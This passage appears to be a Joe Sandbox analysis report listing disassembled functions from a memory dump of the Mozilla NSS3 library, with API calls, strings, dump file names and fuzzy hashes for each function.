Instruction Fuzzy Hash: E531C579701185ABDB009F18DD48EAE77B1EB4A31DF0B4528E408A7612DB32ED98CB52

Function 6CB6CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CB6CC7B), ref: 6CB6CD7A

Part of subcall function 6CB6CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CADC1A8,?), ref: 6CB6CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB6CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB6CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CB6CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB6CD8E

Part of subcall function 6CA905C0: PR_EnterMonitor.NSS3 ref: 6CA905D1
Part of subcall function 6CA905C0: PR_ExitMonitor.NSS3 ref: 6CA905EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB6CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB6CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB6CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB6CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CB6CE48

Strings

freeaddrinfo, xrefs: 6CB6CD9F, 6CB6CE10
wship6.dll, xrefs: 6CB6CDE3
getnameinfo, xrefs: 6CB6CDB2, 6CB6CE23
ws2_32.dll, xrefs: 6CB6CD75
getaddrinfo, xrefs: 6CB6CD88, 6CB6CDF9

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 98507ecb6370e78cad9104e8ceb50f9ae5a8fa511b01c9b996b00aa3ba7e6846
Instruction ID: 77c5803067f15bd809dcb28f256fd8e44db4243879f39ab814c6b150dc953f0e
Opcode Fuzzy Hash: 98507ecb6370e78cad9104e8ceb50f9ae5a8fa511b01c9b996b00aa3ba7e6846
Instruction Fuzzy Hash: BE11D6AAF131B113DF01667AEC0199E39F9DB1215DF1A4539D805D2F00FB22E58883E3

Function 6CBB1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CBB13BC,?,?,?,6CBB1193), ref: 6CBB1C6B
PR_NewLock.NSS3(?,6CBB1193), ref: 6CBB1C7E

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

PR_NewCondVar.NSS3(00000000,?,6CBB1193), ref: 6CBB1C91

Part of subcall function 6CA8BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CA921BC), ref: 6CA8BB8C

PR_NewCondVar.NSS3(00000000,?,?,6CBB1193), ref: 6CBB1CA7

Part of subcall function 6CA8BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA8BBEB
Part of subcall function 6CA8BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CA8BBFB
Part of subcall function 6CA8BB80: GetLastError.KERNEL32 ref: 6CA8BC03
Part of subcall function 6CA8BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CA8BC19
Part of subcall function 6CA8BB80: free.MOZGLUE(00000000), ref: 6CA8BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6CBB1193), ref: 6CBB1CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6CBB1193), ref: 6CBB1CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CBB1193), ref: 6CBB1CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6CBB1193), ref: 6CBB1D1A

Part of subcall function 6CB69BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA91A48), ref: 6CB69BB3
Part of subcall function 6CB69BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA91A48), ref: 6CB69BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CBB1193), ref: 6CBB1D3D

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6CBB1193), ref: 6CBB1D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CBB1193), ref: 6CBB1D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CBB1193), ref: 6CBB1D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CBB1193), ref: 6CBB1D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6CBB1193), ref: 6CBB1D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6CBB1193), ref: 6CBB1D93
PR_DestroyLock.NSS3(00000000,?,?,6CBB1193), ref: 6CBB1D9F
free.MOZGLUE(00000000,?,6CBB1193), ref: 6CBB1DA8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 614e4498281555d0bd54de110c5740ae584566f6afb019531142074dc222301d
Instruction ID: ea70ec01d6293932a063affa71bf9dbbe2bfb6ff993c0ec2a24b71f663113103
Opcode Fuzzy Hash: 614e4498281555d0bd54de110c5740ae584566f6afb019531142074dc222301d
Instruction Fuzzy Hash: FC31E5F1E017519BEB209F65AC01A6B76F4EF0164CB084538E84A97B51FF31E418CBA2

Function 6CB05CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CB05EC0,00000000,?,?), ref: 6CB05CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CB05CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CB05CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CB05D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CB05EC0,00000000,?,?), ref: 6CB05D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CB05D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB05D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CB05D80

Strings

dbm:, xrefs: 6CB05D03, 6CB05D60
extern:, xrefs: 6CB05CEA, 6CB05D4B
sql:, xrefs: 6CB05CD1, 6CB05D36
multiaccess:, xrefs: 6CB05CB8
NSS_DEFAULT_DB_TYPE, xrefs: 6CB05D1A

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: c412a5ed623c594bea302e181e28b440e8832962b9973b34076e86d95b602fdf
Instruction ID: 5fd500c1574c32850ca8dfee6c838a1a3a7f4247299b330d457b27bad82b9963
Opcode Fuzzy Hash: c412a5ed623c594bea302e181e28b440e8832962b9973b34076e86d95b602fdf
Instruction Fuzzy Hash: 48313AB47013E25BF7111A249C48F663F68EF01798F100132EDA5E7E82EBB1D409C25E

Function 6CB06CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBD1DE0,?), ref: 6CB06CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB06D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CB06D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CB06D82
DER_GetInteger_Util.NSS3(?), ref: 6CB06DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB06DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CB06E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CB06F19
PK11_DigestBegin.NSS3(00000000), ref: 6CB06F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CB06F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB07011
PK11_FreeSymKey.NSS3(00000000), ref: 6CB07033
free.MOZGLUE(?), ref: 6CB0703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CB07060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CB07087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CB070AF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 54d99063dd13651ac1cf135ba324ba47cc1bc274d8f87b1d1056b06a41685d1d
Instruction ID: 67e1583f21f75fdf2886161df0152fbcd5119f967dc70a2069f7e9bfd4aece3f
Opcode Fuzzy Hash: 54d99063dd13651ac1cf135ba324ba47cc1bc274d8f87b1d1056b06a41685d1d
Instruction Fuzzy Hash: A3A1F771B043809BEB009B24DC45B5A7BA5EB8131CF244A39ED19DBA81E775D8C9C793

Function 6CACAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACAF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACAF39
PR_Unlock.NSS3(?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACAF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACAF69
TlsGetValue.KERNEL32 ref: 6CACB06B
EnterCriticalSection.KERNEL32(?), ref: 6CACB083
PR_Unlock.NSS3(?), ref: 6CACB0A4
TlsGetValue.KERNEL32 ref: 6CACB0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CACB0D9
PR_Unlock.NSS3 ref: 6CACB102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACB151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACB182

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CACB177

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACB1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACB1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CAAAB95,00000000,?,00000000,00000000,00000000), ref: 6CACB1C2

Part of subcall function 6CAF1560: TlsGetValue.KERNEL32(00000000,?,6CAC0844,?), ref: 6CAF157A
Part of subcall function 6CAF1560: EnterCriticalSection.KERNEL32(?,?,?,6CAC0844,?), ref: 6CAF158F
Part of subcall function 6CAF1560: PR_Unlock.NSS3(?,?,?,?,6CAC0844,?), ref: 6CAF15B2

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: 0f898572cc235d974e469807c844cf65368d5b14360f4d8c207e946ab35cd4a3
Instruction ID: d27a51a1fa45d2f57fff15b8bdda9b82a9ff6b4caee7d0d1716652ba8db5b793
Opcode Fuzzy Hash: 0f898572cc235d974e469807c844cf65368d5b14360f4d8c207e946ab35cd4a3
Instruction Fuzzy Hash: C7A1A1B5E002059BEF009F64ED41AEEB7B5EF04308F144129E919A7751E732E9D9CBE2

Function 6CB1AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1ADB1

Part of subcall function 6CAFBE30: SECOID_FindOID_Util.NSS3(6CAB311B,00000000,?,6CAB311B,?), ref: 6CAFBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB1ADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB1AE08

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB1AE25
PL_FreeArenaPool.NSS3 ref: 6CB1AE63
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CB1AE4D

Part of subcall function 6CA24C70: TlsGetValue.KERNEL32(?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24C97
Part of subcall function 6CA24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CB0
Part of subcall function 6CA24C70: PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1AE93
PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CB1AECC
PL_FreeArenaPool.NSS3 ref: 6CB1AEDE
PL_FinishArenaPool.NSS3 ref: 6CB1AEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB1AEF5
PL_FinishArenaPool.NSS3 ref: 6CB1AF16

Strings

security, xrefs: 6CB1ADEE

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: f36b951b0c40aba57d9e49b8eef693d0328496bd5de879efd081a16fe027c297
Instruction ID: fc155614ffd090be713e013d9f9fdd242bfdfb240b49d9bdea8cfdc77c4fb71f
Opcode Fuzzy Hash: f36b951b0c40aba57d9e49b8eef693d0328496bd5de879efd081a16fe027c297
Instruction Fuzzy Hash: E94107B690829067EB114B28DC45BAF36B8EF4271CF240525E81497F85FB35A58C8ED3

Function 6CBBAF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB69890: TlsGetValue.KERNEL32(?,?,?,6CB697EB), ref: 6CB6989E

EnterCriticalSection.KERNEL32(?), ref: 6CBBAF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6CBBAFCE
PR_SetPollableEvent.NSS3(?), ref: 6CBBAFD9
EnterCriticalSection.KERNEL32(?), ref: 6CBBAFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6CBBB00F
_PR_MD_UNLOCK.NSS3(?), ref: 6CBBB02F
_PR_MD_UNLOCK.NSS3(?), ref: 6CBBB070
PR_JoinThread.NSS3(?), ref: 6CBBB07B
free.MOZGLUE(?), ref: 6CBBB084
EnterCriticalSection.KERNEL32(?), ref: 6CBBB09B
_PR_MD_UNLOCK.NSS3(?), ref: 6CBBB0C4
PR_JoinThread.NSS3(?), ref: 6CBBB0F3
free.MOZGLUE(?), ref: 6CBBB0FC
PR_JoinThread.NSS3(?), ref: 6CBBB137
free.MOZGLUE(?), ref: 6CBBB140

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: afae521927861f30a9b619cb7e82439eb17853392a9a8ad542c5981a216f033d
Instruction ID: ca127054c501257d5842358508051bb0df02d7a6d767a3b8e093555dd5511bd2
Opcode Fuzzy Hash: afae521927861f30a9b619cb7e82439eb17853392a9a8ad542c5981a216f033d
Instruction Fuzzy Hash: 48915CB5900641DFCB00DF15D8C086ABBF5FF493587298569D819ABB22EB32FC49CB91

Function 6CB35CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6CB32BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB32A28,00000060,00000001), ref: 6CB32BF0
Part of subcall function 6CB32BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CB32A28,00000060,00000001), ref: 6CB32C07
Part of subcall function 6CB32BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CB32A28,00000060,00000001), ref: 6CB32C1E
Part of subcall function 6CB32BE0: free.MOZGLUE(?,00000000,00000000,?,6CB32A28,00000060,00000001), ref: 6CB32C4A

free.MOZGLUE(?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35D0F
free.MOZGLUE(?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35D4E
free.MOZGLUE(?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35D62
free.MOZGLUE(?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35D85
free.MOZGLUE(?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35D99
free.MOZGLUE(?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB35E3E
free.MOZGLUE(?,?,?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB35E47
free.MOZGLUE(?,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000,?,6CB380C1), ref: 6CB35E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6CB3AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6CB35E78
free.MOZGLUE(?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB35EB9
free.MOZGLUE(?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB35EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB35F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CB3AAD4), ref: 6CB35F4B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: dbe8cd89a77e29b0656116768317b52368e799c08620365c540353c30245aeae
Instruction ID: 1f3b183889f2ff3b297f3058d7e85ed78d75f42657af07d521c1b98d19168626
Opcode Fuzzy Hash: dbe8cd89a77e29b0656116768317b52368e799c08620365c540353c30245aeae
Instruction Fuzzy Hash: 6171B3B4A00B419FD711CF24D884A96B7F5FF89308F148529E86E87B11E731F969CB92

Function 6CAB8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6CAB8E22
EnterCriticalSection.KERNEL32(?), ref: 6CAB8E36
memset.VCRUNTIME140(?,00000000,?), ref: 6CAB8E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6CAB8E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAB8E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAB8EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6CAB8EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAB8EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6CAB8F00
free.MOZGLUE(?), ref: 6CAB8F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6CAB8F39
memset.VCRUNTIME140(?,00000000,?), ref: 6CAB8F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6CAB8F5B
PR_Unlock.NSS3(?), ref: 6CAB8F72
PR_Unlock.NSS3(?), ref: 6CAB8F82

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 73846936c7c316c8990c2e3132e3cacc496db2040b0ae63cabb73a4626c3e2db
Instruction ID: ca3c8ac0d600f3ec2d9a764bdc6bf8ceccb5fb4a770480375e8f26efd222600f
Opcode Fuzzy Hash: 73846936c7c316c8990c2e3132e3cacc496db2040b0ae63cabb73a4626c3e2db
Instruction Fuzzy Hash: 3451E4B2E002169FE7109E6CCC849AEB7BDEF55358B19412AE818AB710E731ED8587D1

Function 6CADCE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6CADCE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CADCEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6CADCED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6CADCEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6CADCF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6CADCF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6CADCF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6CADCF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6CADCF86
